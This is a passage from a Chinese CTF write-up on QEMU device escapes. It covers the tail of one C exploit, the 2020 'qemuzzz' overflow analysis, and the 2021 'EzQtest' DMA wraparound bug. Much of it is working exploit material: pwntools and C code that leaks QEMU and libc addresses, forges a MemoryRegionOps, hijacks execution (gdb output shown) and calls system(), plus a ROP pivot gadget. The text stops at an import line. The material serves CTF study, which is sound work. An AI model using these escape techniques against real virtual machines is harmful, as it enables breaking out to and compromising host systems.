uint16_t pio_base (void ) { return g_pio.base; }uint32_t pio_size (void ) { return g_pio.size; }static inline int pio_port (uint32_t off, int width, uint16_t * port_out) { if (!g_pio.inited) { errno = EPERM; return -1 ; } if ((uint64_t )off + (uint64_t )width > g_pio.size) { errno = ERANGE; return -1 ; } uint32_t p = (uint32_t )g_pio.base + off; if (p > 0xFFFF u) { errno = ERANGE; return -1 ; } *port_out = (uint16_t )p; return 0 ; } uint8_t pio_read8 (uint32_t off) { uint16_t p; if (pio_port(off, 1 , &p)) return 0 ; return inb(p); } uint16_t pio_read16 (uint32_t off) { uint16_t p; if (pio_port(off, 2 , &p)) return 0 ; return inw(p); } uint32_t pio_read32 (uint32_t off) { uint16_t p; if (pio_port(off, 4 , &p)) return 0 ; return inl(p); } void pio_write8 (uint32_t off, uint8_t v) { uint16_t p; if (pio_port(off, 1 , &p)) return ; outb(v, p); } void pio_write16 (uint32_t off, uint16_t v) { uint16_t p; if (pio_port(off, 2 , &p)) return ; outw(v, p); } void pio_write32 (uint32_t off, uint32_t v) { uint16_t p; if (pio_port(off, 4 , &p)) return ; outl(v, p); } void tea_encrypt (uint64_t * val, const uint32_t key[4 ]) { uint32_t val_hi = *val >> 32 , val_lw = *val; for (uint32_t delta = 0x9e3779b9 ; delta != 0x6526b0d9 ; delta -= 0x61C88647 ) { val_lw += (delta + val_hi) ^ (key[1 ] + (val_hi >> 5 )) ^ (key[0 ] + (val_hi << 4 )); val_hi += (delta + val_lw) ^ (key[3 ] + (val_lw >> 5 )) ^ (key[2 ] + (val_lw << 4 )); } *val = (1ULL * val_hi << 32 ) | val_lw; } void tea_decrypt (uint64_t * val, const uint32_t key[4 ]) { uint32_t val_hi = *val >> 32 , val_lw = *val; for (uint32_t delta = 0xC6EF3720 ; delta; delta += 0x61C88647 ) { val_hi -= (delta + val_lw) ^ (key[3 ] + (val_lw >> 5 )) ^ (key[2 ] + (val_lw << 4 )); val_lw -= (delta + val_hi) ^ (key[1 ] + (val_hi >> 5 )) ^ (key[0 ] + (val_hi << 4 )); } *val = (1ULL * val_hi << 32 ) | val_lw; } int main () { mmio_init("0000:00:03.0" , 0 ); pio_init("0000:00:03.0" , 1 ); pio_write32(4 , 0x114514 ); pio_write32(0x8 , 0x100 ); uint32_t lo = mmio_read32(0x18 ); uint32_t hi = mmio_read32(0x18 ); uint64_t rand_r_addr = ((uint64_t )hi << 32 ) | lo; tea_encrypt(&rand_r_addr, (uint32_t []){0 , 0 , 0 , 0 }); printf ("[+] rand_r addr: %p\n" , rand_r_addr); size_t libc_base = rand_r_addr - 0x48d30 ; printf ("[+] libc base: %p\n" , libc_base); size_t system_addr = libc_base + 0x53290 ; printf ("[+] system addr: %p\n" , system_addr); tea_decrypt(&system_addr, (uint32_t []){0 , 0 , 0 , 0 }); mmio_write32(0x18 , system_addr); mmio_write32(0x18 , system_addr >> 32 ); pio_write32(0x8 , 0 ); char cmd[] = "/usr/bin/gnome-calculator" ; for (int i = 4 ; i < sizeof (cmd); i += 8 ) { uint64_t val = *(uint64_t *)&cmd[i]; tea_decrypt(&val, (uint32_t []){0 , 0 , 0 , 0 }); mmio_write32(i, val); mmio_write32(i, val >> 32 ); } pio_write32(0x1C , *(uint32_t *)cmd); return 0 ; }
华为云2020 qemuzzz 漏洞分析 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 #include "qemu/osdep.h" #include "hw/pci/pci.h" #include "qapi/error.h" #include "exec/memory.h" #include "exec/cpu-common.h" #include "hw/pci/pci_regs.h" #define TYPE_ZZZ "zzz" OBJECT_DECLARE_SIMPLE_TYPE(ZZZState, ZZZ) #define ZZZ_REG_OFFSET 0x10 #define ZZZ_REG_LEN 0x18 #define ZZZ_REG_ADDR 0x20 #define ZZZ_CMD_XOR 0x50 #define ZZZ_CMD_KICK 0x60 #define ZZZ_BAR0_SIZE 0x100000 #define ZZZ_BUF_SIZE 0x1000 struct ZZZState { PCIDevice parent_obj; MemoryRegion mmio; hwaddr addr; uint16_t len; uint16_t offset; int16_t rsvd0; int16_t rsvd1; uint8_t buf[ZZZ_BUF_SIZE]; struct ZZZState *opaque ; void (*cpu_physical_memory_rw)(hwaddr, uint8_t *, hwaddr, int ); }; static uint64_t zzz_mmio_read (void *opaque, hwaddr addr, unsigned size) { ZZZState *s = opaque; if (addr <= 0xFFF ) { return s->buf[addr]; } return 0 ; } static void zzz_mmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned size) { ZZZState *s = opaque; switch (addr) { case ZZZ_REG_ADDR: s->addr = ((hwaddr)val) << 12 ; break ; case ZZZ_REG_OFFSET: if (val > 0x0FFF u) { if (s->offset > 0x0FFF u) { s->offset = 0 ; } } else { s->offset = (uint16_t )val; } break ; case ZZZ_REG_LEN: s->len = (uint16_t )val; break ; case ZZZ_CMD_XOR: { uint32_t off = s->offset; int len0 = (int )(s->len & 0x7FFE ); if ((int )off + len0 >= 0x1000 ) { len0 = 4095 - (int )off; } int words = len0 >> 1 ; for (int j = 0 ; j < words; ++j) { uint16_t *p = (uint16_t *)(s->buf + off + (j * 2 )); *p ^= 0x0209 u; } break ; } case ZZZ_CMD_KICK: { ZZZState *t = s->opaque; if ((t->addr & 0xFFF ) == 0 ) { int16_t len1 = (int16_t )t->len; uint32_t off = t->offset; uint16_t l = (uint16_t )(len1 & 0x7FFE ); if ((int )(off + (uint32_t )(len1 & 0x7FFE ) - 1 ) <= 0x1000 ) { uint8_t *buf = &t->buf[off]; void (*fn)(hwaddr, uint8_t *, hwaddr, int ) = s->cpu_physical_memory_rw; if (len1 & 1 ) { fn(t->addr, buf, l, 1 ); } else { fn(t->addr, buf, l, 0 ); } if ((int16_t )t->len < 0 ) { pci_set_irq(&t->parent_obj, 1 ); } } } break ; } default : break ; } } static const MemoryRegionOps zzz_mmio_ops = { .read = zzz_mmio_read, .write = zzz_mmio_write, .endianness = DEVICE_NATIVE_ENDIAN, }; static void zzz_instance_init (Object *obj) { ZZZState *s = ZZZ(obj); s->opaque = s; s->cpu_physical_memory_rw = cpu_physical_memory_rw; } static void pci_zzz_realize (PCIDevice *pdev, Error **errp) { ZZZState *s = ZZZ(pdev); pdev->config[PCI_INTERRUPT_PIN] = 1 ; memory_region_init_io(&s->mmio, OBJECT(s), &zzz_mmio_ops, s, "zzz-mmio" , ZZZ_BAR0_SIZE); pci_register_bar(pdev, 0 , PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio); } static void pci_zzz_uninit (PCIDevice *pdev) { } static void zzz_class_init (ObjectClass *oc, void *data) { PCIDeviceClass *k = PCI_DEVICE_CLASS(oc); k->realize = pci_zzz_realize; k->exit = pci_zzz_uninit; k->vendor_id = 0x1234 ; k->device_id = 0x2333 ; k->revision = 0x10 ; k->class_id = PCI_CLASS_OTHERS; } static const TypeInfo zzz_info = { .name = TYPE_ZZZ, .parent = TYPE_PCI_DEVICE, .instance_size = sizeof (ZZZState), .instance_init = zzz_instance_init, .class_init = zzz_class_init, }; static void pci_zzz_register_types (void ) { type_register_static(&zzz_info); } type_init(pci_zzz_register_types);
addr 为 0x60 时存在 1 字节越界。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 case ZZZ_CMD_KICK: { ZZZState *t = s->opaque; if ((t->addr & 0xFFF ) == 0 ) { int16_t len1 = (int16_t )t->len; uint32_t off = t->offset; uint16_t l = (uint16_t )(len1 & 0x7FFE ); if ((int )(off + (uint32_t )(len1 & 0x7FFE ) - 1 ) <= 0x1000 ) { uint8_t *buf = &t->buf[off]; void (*fn)(hwaddr, uint8_t *, hwaddr, int ) = s->cpu_physical_memory_rw; if (len1 & 1 ) { fn(t->addr, buf, l, 1 ); } else { fn(t->addr, buf, l, 0 ); } if ((int16_t )t->len < 0 ) { pci_set_irq(&t->parent_obj, 1 ); } } } break ; }
zzzState 结构体中 buf 与 opaque 相邻,因此可以修改 opaque。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 struct ZZZState { PCIDevice parent_obj; MemoryRegion mmio; hwaddr addr; uint16_t len; uint16_t offset; int16_t rsvd0; int16_t rsvd1; uint8_t buf[ZZZ_BUF_SIZE]; struct ZZZState *opaque ; void (*cpu_physical_memory_rw)(hwaddr, uint8_t *, hwaddr, int ); };
而 cpu_physical_memory_rw 用的 addr,len,offset 都是通过 opaque 指针定位的,因此修改 opaque 指针指向伪造的 opaque 可以伪造 addr,len,offset 造成更大范围的越界读写。
通过越界读写 buf 后面的数据可以泄露 qemu 地址和劫持程序执行流。
漏洞利用
越界写把 opaque 改大使得 opaque 指针指向的 opaque 的 addr ,len ,offset 为我们在 buf 中伪造的。
越界读出 opaque 和 cpu_physical_memory_rw ,从而泄露 opaque 地址和 qemu 地址。
由于此时 addr == 0x60 只能进行读操作,因此我们需要使用 addr == 0x50 时的异或 0x209 来修改 len 使得 addr == 0x60 可以进行写操作。为了让异或的后的 len 和 offset 在 addr == 0x60 时可以通过检查并且能够有足够多的越界,前面第一步伪造的 addr 和 len 需要进行爆破。
越界写覆盖 cpu_physical_memory_rw 为 system@plt , opaque_ptr 指向新的 opaque 并且新的 opaque 中的 addr 指向要执行的命令的地址,并且在要执行的的地址处写入命令。这里条件限制较多,特别是参数地址需要关于页对齐。为了尽可能满足条件,需要新的 opaque 地址尽可能小,也就是第一步伪造的 offset 异或 0x209 之后尽可能小。在第一步爆破的时候也要添加这一条件。
2021qwb-EzQtest 环境搭建 先打开 universe 源并刷新索引:
1 2 3 4 5 6 7 8 9 10 sudo add-apt-repository universe -ysudo apt-get updatesudo apt-get install -y \ xen-hypervisor-4.11-amd64 xen-utils-4.11 \ libxenstore3.0 libxentoolcore1 libxencall1 libxenmisc4.11 \ libxenforeignmemory1 libxengnttab1 libxenevtchn1 libxendevicemodel1 sudo apt-get install -y \ libsnappy1v5 libfdt1 vde2 libiscsi7 librbd1 librados2 libaio1
然后 launch.sh 以 qtest 测试机模式 启动 QEMU:
1 2 3 4 5 6 7 8 ./qemu-system-x86_64 \ -display none \ -machine accel=qtest \ -m 512M \ -device qwb \ -nodefaults \ -monitor none \ -qtest stdio
-machine accel=qtest -qtest stdio = qtest 测试机模式 :
漏洞分析 首先题目代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 #include "qemu/osdep.h" #include "qapi/error.h" #include "hw/pci/pci.h" #include "hw/pci/pci_regs.h" #include "hw/mem/pc-dimm.h" #include "hw/qdev-properties.h" #include "exec/memory.h" #include "hw/irq.h" #include "hw/qdev-clock.h" #include "hw/qdev-core.h" #include "qemu/typedefs.h" #define TYPE_QWB "qwb" OBJECT_DECLARE_SIMPLE_TYPE(QWBState, QWB) typedef uint64_t dma_addr_t ;typedef struct dma_state { dma_addr_t src; dma_addr_t dst; dma_addr_t cnt; dma_addr_t cmd; } dma_state; typedef struct QWBState { PCIDevice pdev; MemoryRegion mmio; uint32_t dma_info_size; uint32_t dma_info_idx; uint32_t dma_using; uint32_t _pad; dma_state dma_info[32 ]; uint8_t dma_buf[0x1000 ]; } QWBState; static uint64_t qwb_mmio_read (void *opaque, hwaddr addr, unsigned size) ;static void qwb_mmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned size) ;static const MemoryRegionOps qwb_mmio_ops = { .read = qwb_mmio_read, .write = qwb_mmio_write, .endianness = DEVICE_NATIVE_ENDIAN, .valid = { .min_access_size = 4 , .max_access_size = 8 , .unaligned = false , }, .impl = { .min_access_size = 4 , .max_access_size = 8 , .unaligned = false , }, }; static void qwb_do_dma (QWBState *s) { size_t i; s->dma_using = 1 ; for (i = 0 ; i < s->dma_info_size; i++) { dma_state *d = &s->dma_info[i]; if (d->cmd) { if (d->src + d->cnt > 0x1000 || d->cnt > 0x1000 ) { goto end; } } else { if (d->dst + d->cnt > 0x1000 || d->cnt > 0x1000 ) { goto end; } } } for (i = 0 ; i < s->dma_info_size; i++) { dma_state *d = &s->dma_info[i]; if (d->cmd) { pci_dma_write(&s->pdev, d->dst, &s->dma_buf[d->src], d->cnt); } else { pci_dma_read(&s->pdev, d->src, &s->dma_buf[d->dst], d->cnt); } } end: s->dma_using = 0 ; } static uint64_t qwb_mmio_read (void *opaque, hwaddr addr, unsigned size) { QWBState *s = opaque; uint64_t v = ~0ULL ; if (size != 8 ) return v; switch (addr) { case 0x00 : v = s->dma_info_size; break ; case 0x08 : if (!s->dma_using) v = s->dma_info_idx; break ; case 0x10 : if (!s->dma_using && s->dma_info_idx <= 0x1F ) v = s->dma_info[s->dma_info_idx].src; break ; case 0x18 : if (!s->dma_using && s->dma_info_idx <= 0x1F ) v = s->dma_info[s->dma_info_idx].dst; break ; case 0x20 : if (!s->dma_using && s->dma_info_idx <= 0x1F ) v = s->dma_info[s->dma_info_idx].cnt; break ; case 0x28 : if (!s->dma_using && s->dma_info_idx <= 0x1F ) v = s->dma_info[s->dma_info_idx].cmd; break ; case 0x30 : if (!s->dma_using) { qwb_do_dma(s); v = 1 ; } break ; default : break ; } return v; } static void qwb_mmio_write (void *opaque, hwaddr addr, uint64_t val, unsigned size) { QWBState *s = opaque; if (size != 8 ) return ; switch (addr) { case 0x00 : if (val <= 0x20 ) s->dma_info_size = val; break ; case 0x08 : if (!s->dma_using && val <= 0x1F ) s->dma_info_idx = val; break ; case 0x10 : if (!s->dma_using && s->dma_info_idx <= 0x1F ) s->dma_info[s->dma_info_idx].src = val; break ; case 0x18 : if (!s->dma_using && s->dma_info_idx <= 0x1F ) s->dma_info[s->dma_info_idx].dst = val; break ; case 0x20 : if (!s->dma_using && s->dma_info_idx <= 0x1F ) s->dma_info[s->dma_info_idx].cnt = val; break ; case 0x28 : if (!s->dma_using && s->dma_info_idx <= 0x1F ) s->dma_info[s->dma_info_idx].cmd = (val & 1 ); break ; default : break ; } } static void qwb_instance_init (Object *obj) { QWBState *s = QWB(obj); s->dma_info_size = 0 ; s->dma_info_idx = 0 ; s->dma_using = 0 ; } static void qwb_realize (PCIDevice *pdev, Error **errp) { QWBState *s = QWB(pdev); memory_region_init_io(&s->mmio, OBJECT(pdev), &qwb_mmio_ops, s, "qwb-mmio" , 0x100000 ); pci_register_bar(pdev, 0 , PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio); } static void qwb_uninit (PCIDevice *pdev) { QWBState *s = QWB(pdev); s->dma_info_size = s->dma_info_idx = s->dma_using = 0 ; } static void qwb_class_init (ObjectClass *oc, void *data) { DeviceClass *dc = DEVICE_CLASS(oc); PCIDeviceClass *k = PCI_DEVICE_CLASS(oc); k->realize = qwb_realize; k->exit = qwb_uninit; k->vendor_id = 0x2021 ; k->device_id = 0x0612 ; k->revision = 0x10 ; k->class_id = PCI_CLASS_OTHERS; set_bit(DEVICE_CATEGORY_MISC, dc->categories); } static const TypeInfo qwb_info = { .name = TYPE_QWB, .parent = TYPE_PCI_DEVICE, .instance_size = sizeof (QWBState), .instance_init = qwb_instance_init, .class_init = qwb_class_init, }; static void qwb_register_types (void ) { type_register_static(&qwb_info); } type_init(qwb_register_types)
这是一个简化的 DMA 控制器 ,挂在 PCI 上,暴露一个 1MiB 的 MMIO BAR。它内部有一块 4KB 的设备缓冲区 dma_buf,和最多 32 条 DMA 描述符 dma_info[32]。通过 MMIO 寄存器把描述符填好,再读 一次 BASE+0x30 就会调用 qwb_do_dma() 执行 DMA。
我们对 MMIO 读写的偏移对应着下面几种功能:
偏移
名称
访问
语义
0x00
SIZE
R/W
队列长度(条目数),0..32。写时未检查 dma_using(漏洞之一) 。读返回当前长度。
0x08
IDX
R/W
当前条目索引 0..31。仅在 dma_using==0 时可写/可读 ;忙时读返回~0。
0x10
SRC
R/W
针对 IDX 指向条目。读/写都要求 !(dma_using) 且 IDX<=31(读里通过“拼字段”技巧实现)。
0x18
DST
R/W
同上。
0x20
CNT
R/W
同上。
0x28
CMD
R/W
只使用 bit0:0=system→device,1=device→system。
0x30
START
R
读触发 。若 !dma_using,调用 qwb_do_dma() 执行前 SIZE 条,返回 1;否则返回 ~0。
也就是先用其他功能号设置必要的字段,然后再通过 0x30 偏移的读操作来触发 qwb_do_dma 函数进行实际的读写操作。
1 2 cmd == 1 : pci_dma_write(&pdev, dst, &dma_buf[src], cnt); cmd == 0 : pci_dma_read (&pdev, src, &dma_buf[dst], cnt);
cmd==0(guest→device):从“来宾物理内存(guest RAM)”拷贝到设备内部 dma_buf[dst..dst+cnt);
cmd==1(device→guest):从设备内部 dma_buf[src..src+cnt) 拷贝到来宾物理内存 (dst)。
漏洞点位于 qwb_do_dma() 的第一段检查(只检查设备侧的 dma_buf 界限):
1 2 3 4 5 if (d->cmd) { if (d->src + d->cnt > 0x1000 || d->cnt > 0x1000 ) goto end; } else { if (d->dst + d->cnt > 0x1000 || d->cnt > 0x1000 ) goto end; }
这里的 d->src + d->cnt 与 d->dst + d->cnt 在 C 里是 无符号 64 位加法 。若选择 cnt 为一个不大的值(<=0x1000 以避开第二个条件),但让 src 或 dst 接近 2^64,则加法会回绕到很小 ,从而通过 <=0x1000 的判断。
于是后续真实 DMA 阶段会把 &s->dma_buf[src] 或 &s->dma_buf[dst] 当作宿主进程地址空间中的指针 继续使用,形成:
cmd==1:越界读宿主内存 (pci_dma_write(..., s->dma_buf + src, cnt) 以该指针为源);
cmd==0:越界写宿主内存 (pci_dma_read(..., s->dma_buf + dst, cnt) 为目的)。
也就是说我们可以从 dma_buf 往前最多 0x1000 长度越界读写,最大读写长度是 0x1000,并且读写区间的末尾必须落到 dma_buf 范围。
漏洞利用 观察 dma_buf 所在的 QWBState 结构体:
1 2 3 4 5 6 7 8 9 10 typedef struct QWBState { PCIDevice pdev; MemoryRegion mmio; uint32_t dma_info_size; uint32_t dma_info_idx; uint32_t dma_using; uint32_t _pad; dma_state dma_info[32 ]; uint8_t dma_buf[0x1000 ]; } QWBState;
在 dma_buf 越界读写范围内有一个 MemoryRegion 结构体 mmio,这个结构体在 qwb_realize 注册 MMIO 内存的时候被初始化。
1 2 3 4 5 6 static void qwb_realize (PCIDevice *pdev, Error **errp) { QWBState *s = QWB(pdev); memory_region_init_io(&s->mmio, OBJECT(pdev), &qwb_mmio_ops, s, "qwb-mmio" , 0x100000 ); pci_register_bar(pdev, 0 , PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio); }
MemoryRegion 结构体定义如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 struct MemoryRegion { Object parent_obj; bool romd_mode; bool ram; bool subpage; bool readonly; bool nonvolatile; bool rom_device; bool flush_coalesced_mmio; bool global_locking; uint8_t dirty_log_mask; bool is_iommu; RAMBlock *ram_block; Object *owner; const MemoryRegionOps *ops; void *opaque; MemoryRegion *container; Int128 size; hwaddr addr; void (*destructor)(MemoryRegion *mr); uint64_t align; bool terminates; bool ram_device; bool enabled; bool warning_printed; uint8_t vga_logging_count; MemoryRegion *alias; hwaddr alias_offset; int32_t priority; QTAILQ_HEAD(, MemoryRegion) subregions; QTAILQ_ENTRY(MemoryRegion) subregions_link; QTAILQ_HEAD(, CoalescedMemoryRange) coalesced; const char *name; unsigned ioeventfd_nb; MemoryRegionIoeventfd *ioeventfds; };
我们可以从这个区域内泄露 QWBState 地址和 QEMU 程序基地址。
pwndbg> telescope 0x55b9e81feee0+0xe00-0x4b8
00:0000│ 0x55b9e81ff828 —▸ 0x55b9cbc6ed80 (qwb_mmio_ops) —▸ 0x55b9cb03ffa5 (qwb_mmio_read) ◂— endbr64
01:0008│ 0x55b9e81ff830 —▸ 0x55b9e81feee0 —▸ 0x55b9e7571790 —▸ 0x55b9e736bb00 —▸ 0x55b9e7304f00 ◂— ...
02:0010│ 0x55b9e81ff838 —▸ 0x55b9e75e6400 —▸ 0x55b9e744b4a0 —▸ 0x55b9e73aa140 —▸ 0x55b9e73aa2c0 ◂— ...
03:0018│ 0x55b9e81ff840 ◂— 0x100000
04:0020│ 0x55b9e81ff848 ◂— 0
05:0028│ 0x55b9e81ff850 ◂— 0xf0000000
06:0030│ 0x55b9e81ff858 —▸ 0x55b9cb3c5631 (memory_region_destructor_none) ◂— endbr64
07:0038│ 0x55b9e81ff860 ◂— 0
1 2 3 4 5 6 7 8 9 10 qt = QTest(["./launch.sh" ]) qwb = QWB(qt, base=0xf0000000 ) qemu = ELF("./qemu-system-x86_64" ) leak = qwb.oob_read_before(neg_off=0x4b8 , nbytes=0x600 , ram_out=0x300000 ) print (hexdump(leak))QWBState_addr = u64(leak[0x8 :0x8 + 8 ]) success("QWBState_addr: " + hex (QWBState_addr)) qemu.address = u64(leak[0x30 :0x30 + 8 ]) - qemu.sym['memory_region_destructor_none' ] success("qemu base: " + hex (qemu.address))
MemoryRegionOps 中的 read 和 write 回调函数用来处理针对这块 IO 映射内存的操作:
pwndbg> p qwb_mmio_ops
$2 = {
read = 0x55b9cb03ffa5 <qwb_mmio_read >,
write = 0x55b9cb0401bd <qwb_mmio_write >,
read_with_attrs = 0x0 ,
write_with_attrs = 0x0 ,
endianness = DEVICE_NATIVE_ENDIAN,
valid = {
min_access_size = 4,
max_access_size = 8,
unaligned = false,
accepts = 0x0
},
impl = {
min_access_size = 4,
max_access_size = 8,
unaligned = false
}
}
我们可以劫持这个 ops 指针指向可控内存,然后在这块内存中伪造一个 MemoryRegionOps 结构从而劫持程序执行流程:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 leak = bytearray (leak) leak[0 :8 ] = p64(QWBState_addr + 0xE00 ) qwb_mmio_ops = flat( p64(0xdeadbeef ), p64(0xdeadbeef ), p64(0 ), p64(0 ), p32(0 ), p32(0 ), p32(4 ), p32(8 ), p32(0 ), p32(0 ), p64(0 ), p32(4 ), p32(8 ), p32(0 ), p32(0 ), ) leak[0x4b8 :0x4b8 + len (qwb_mmio_ops)] = qwb_mmio_ops leak[0x8 :0x8 + 8 ] = b"B" * 8 leak = bytes (leak) qwb.oob_write_before(neg_off=0x4b8 , payload=leak) pause() qwb.oob_write_before(neg_off=0x4b0 , payload=leak)
下一次读写这块内存时成功劫持程序执行流程,并且 rax 和 rdi 寄存器是可控的。
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
───────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────────────────
* RAX 0x4242424242424242 ('BBBBBBBB')
RBX 0x55b7228da8c0 ◂— 1
RCX 8
RDX 1
* RDI 0x4242424242424242 ('BBBBBBBB')
RSI 0
* R8 0xdeadbeef
R9 0xffffffffffffffff
R10 0x55b6fe0c0109 (memory_region_write_accessor) ◂— endbr64
R11 0x7f0ed00dc3c0 ◂— 0x2000200020002
R12 0x55b721e13110 ◂— 0x55b700000002
R13 0x55b6fe1e3238 (qio_channel_fd_source_dispatch) ◂— endbr64
R14 0x7f0ed102f280 —▸ 0x7f0ed0f54e80 ◂— endbr64
R15 0x55b7228da9b0 —▸ 0x55b721e13110 ◂— 0x55b700000002
RBP 0x7ffe36ce3120 —▸ 0x7ffe36ce31a0 —▸ 0x7ffe36ce31f0 —▸ 0x7ffe36ce3250 —▸ 0x7ffe36ce32d0 ◂— ...
RSP 0x7ffe36ce30d8 —▸ 0x55b6fe0c01f6 (memory_region_write_accessor+237) ◂— mov eax , 0
* RIP 0xdeadbeef
────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────
Invalid address 0xdeadbeef
──────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffe36ce30d8 —▸ 0x55b6fe0c01f6 (memory_region_write_accessor+237) ◂— mov eax , 0
01:0008│-040 0x7ffe36ce30e0 —▸ 0x55b7219bc080 ◂— 0x302e37312b20525b ('[R +17.0')
02:0010│-038 0x7ffe36ce30e8 ◂— 0xffffffffffffffff
03:0018│-030 0x7ffe36ce30f0 ◂— 0x800000000
04:0020│-028 0x7ffe36ce30f8 —▸ 0x7ffe36ce31c8 ◂— 1
05:0028│-020 0x7ffe36ce3100 ◂— 0
06:0030│-018 0x7ffe36ce3108 —▸ 0x55b7227f47e0 —▸ 0x55b721a404a0 —▸ 0x55b72199f140 —▸ 0x55b72199f2c0 ◂— ...
07:0038│-010 0x7ffe36ce3110 ◂— 1
────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────
► 0 0xdeadbeef
1 0x55b6fe0c01f6 memory_region_write_accessor+237
2 0x55b6fe0c042d access_with_adjusted_size+317
3 0x55b6fe0c34dc memory_region_dispatch_write+269
4 0x55b6fe153163 flatview_write_continue+197
5 0x55b6fe1532ac flatview_write+140
6 0x55b6fe153626 address_space_write+115
7 0x55b6fe061fd4 qtest_process_command+3455
────────────────────────────────────────────────────────[ THREADS (3 TOTAL) ]────────────────────────────────────────────────────────
► 1 "qemu-system-x86 " stopped : 0xdeadbeef
2 "qemu-system-x86 " stopped : 0x7f0ed005889d <syscall+29 >
3 "qemu-system-x86 " stopped : 0x7f0ecff84322 <sigtimedwait+162 >
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
至此我们的利用思路就很多了,比如让 rdi 指向要执行的命令,然后跳转到 system@plt 执行命令。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 leak = bytearray (leak) leak[0 :8 ] = p64(QWBState_addr + 0xe00 ) qwb_mmio_ops = flat( p64(qemu.plt['system' ]), p64(qemu.plt['system' ]), p64(0 ), p64(0 ), p32(0 ), p32(0 ), p32(4 ), p32(8 ), p32(0 ), p32(0 ), p64(0 ), p32(4 ), p32(8 ), p32(0 ), p32(0 ), ) cmd = "/usr/bin/gnome-calculator" leak[0x4b8 :0x4b8 + len (qwb_mmio_ops)] = qwb_mmio_ops leak[0x4b8 + len (qwb_mmio_ops):0x4b8 + len (qwb_mmio_ops) + len (cmd)] = cmd.encode() leak[0x8 :0x8 + 8 ] = p64(QWBState_addr + 0xe00 + len (qwb_mmio_ops)) leak = bytes (leak) qwb.oob_write_before(neg_off=0x4b8 , payload=leak) pause() qwb.oob_write_before(neg_off=0x4b8 , payload=leak)
或者借助栈迁移指令执行 ROP 进一步可以加载任意 shellcode 执行。
1 0x00000000004dc19c : push rax ; pop rsp ; ret
完整 Exp
1 2 3 4 5 def pci_cfg_readl (self, bus, dev, fn, off ): cfg = 0x80000000 | (bus<<16 ) | (dev<<11 ) | (fn<<8 ) | (off & 0xfc ) self .outl(0xcf8 , cfg) return self .inl(0xcfc )
结论 :只有把 BAR0 写到一个有效的物理地址 ,并且(通常)把 COMMAND.bit1(MEM)置 1 ,BASE+offset 的 readq/writeq 才会真正打到你的设备 qwb_mmio_read/qwb_mmio_write。
在 PC(i440FX)平台上,PCI MMIO 窗口 常见在 3.5G–4G 附近(例如 0xE0000000 起)。题目里内存只有 -m 512M,所以设置 BAR0 为 0xF0000000 远离 RAM,不冲突 ;
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 from pwn import 